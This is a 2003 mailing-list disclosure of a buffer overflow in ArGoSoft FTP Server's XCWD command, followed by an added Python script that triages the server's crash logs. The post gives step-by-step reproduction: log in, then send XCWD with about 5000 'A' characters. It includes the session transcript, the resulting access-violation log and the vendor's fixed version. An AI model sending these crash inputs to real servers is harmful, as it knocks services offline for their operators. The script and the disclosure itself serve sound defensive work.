Vulnerability Development mailing list archives
argosoft ftp server buffer overflow.
From: "Moran Zavdi" <moran () moozatech com>
Date: Thu, 25 Sep 2003 08:59:03 -0700
Hi,

I've found that while using the command XCWD it is possible to overwrite the server memory and crash it.

To overwrite the server's memory an attacker has to do the following:
Verify the logging option is off (turned off by default).
Successfully log in to the FTP server.
At this point, if the attacker issues an XCWD command with an argument above 4096 chars, an overflow will occur.

I tested it on Windows 2000 and XP and they both crashed.
I used putty to cause the overflow.. :) Here is what I did.

c:\> putty.exe localhost 21
220 ArGoSoft FTP Server for Windows NT/2000/XP, Version 1.4 (1.4.1.1)
user ftp
502 Unknown command
user ftp
331 User name OK, need password
pass ftp
230 User ftp logged in successfully
** XCWD AAAAAAA....(5000 times)
client closed connection.

The logs look like this:

9/22/2003 1:38:07 PM - FTP Server started. Listening on port 21
9/22/2003 1:38:34 PM - Requested FTP connection from 127.0.0.1 ID=1
9/22/2003 1:38:49 PM - ( 1) 'Error: Access violation at address 00401F32 in module 'ftpsrvnt.exe'. Write of address 41414145

At this point the server will stop working and crash the program.

ArgoSoft has confirmed it's a bug while passing data using shared memory that allows an attacker to bypass the internal buffer overflow check of the program. They released a new version to fix this issue, version 1.4.1.2. It can be downloaded from:
http://www.argosoft.com/applications/ftpserver/download.asp

Regards,
Moran Zavdi
Moozatech IT Systems
http://www.moozatech.com
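Added example (not part of the original message and not ArGoSoft code): a log triage script that finds access-violation lines in the format quoted above, ties each to the client IP of its connection, and flags faulting addresses made of repeated printable bytes such as 41414145, which indicate request data reached a pointer. The function names, the repeat threshold, the reading of the "( N)" prefix as the connection ID, and the fourth sample log line are assumptions made for the example.

```python
import re
from collections import Counter

# Line formats copied from the server log quoted in the post.
CONN_RE = re.compile(r"Requested FTP connection from (?P<ip>\S+) ID=(?P<id>\d+)")
CRASH_RE = re.compile(
    r"^(?P<ts>\d+/\d+/\d+ \d+:\d+:\d+ [AP]M) - \(\s*(?P<conn>\d+)\) "
    r"'Error: Access violation at address (?P<pc>[0-9A-Fa-f]{8}) "
    r"in module '(?P<module>[^']+)'\. "
    r"(?P<op>Read|Write) of address (?P<target>[0-9A-Fa-f]{8})"
)

def filler_char(addr_hex, min_repeat=3):
    """Return the repeated printable character if a faulting address looks
    like request data (41414145 is 'AAAA' plus a small offset), else None."""
    raw = bytes.fromhex(addr_hex)
    if not all(0x20 <= b <= 0x7E for b in raw):
        return None
    byte, count = Counter(raw).most_common(1)[0]
    return chr(byte) if count >= min_repeat else None

def triage(log_lines):
    """Return one finding per access-violation line, tied to the client IP.
    Assumption: the "( N)" prefix is the connection ID from "ID=N"."""
    clients, findings = {}, []
    for line in log_lines:
        conn = CONN_RE.search(line)
        if conn:
            clients[int(conn["id"])] = conn["ip"]
            continue
        m = CRASH_RE.match(line.strip())
        if m:
            filler = filler_char(m["target"])
            findings.append({
                "timestamp": m["ts"], "client": clients.get(int(m["conn"])),
                "module": m["module"], "operation": m["op"],
                "target": m["target"], "filler": filler,
                "input_controlled": filler is not None,
            })
    return findings

# First three lines are from the post; the last is constructed (a null read).
SAMPLE_LOG = [
    "9/22/2003 1:38:07 PM - FTP Server started. Listening on port 21",
    "9/22/2003 1:38:34 PM - Requested FTP connection from 127.0.0.1 ID=1",
    "9/22/2003 1:38:49 PM - ( 1) 'Error: Access violation at address 00401F32 in module 'ftpsrvnt.exe'. Write of address 41414145",
    "9/22/2003 2:10:11 PM - ( 2) 'Error: Access violation at address 00402A10 in module 'ftpsrvnt.exe'. Read of address 00000000",
]

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f)
```

The constructed null-read line is reported as a crash but not flagged, which separates ordinary faults from ones where the faulting address carries input bytes.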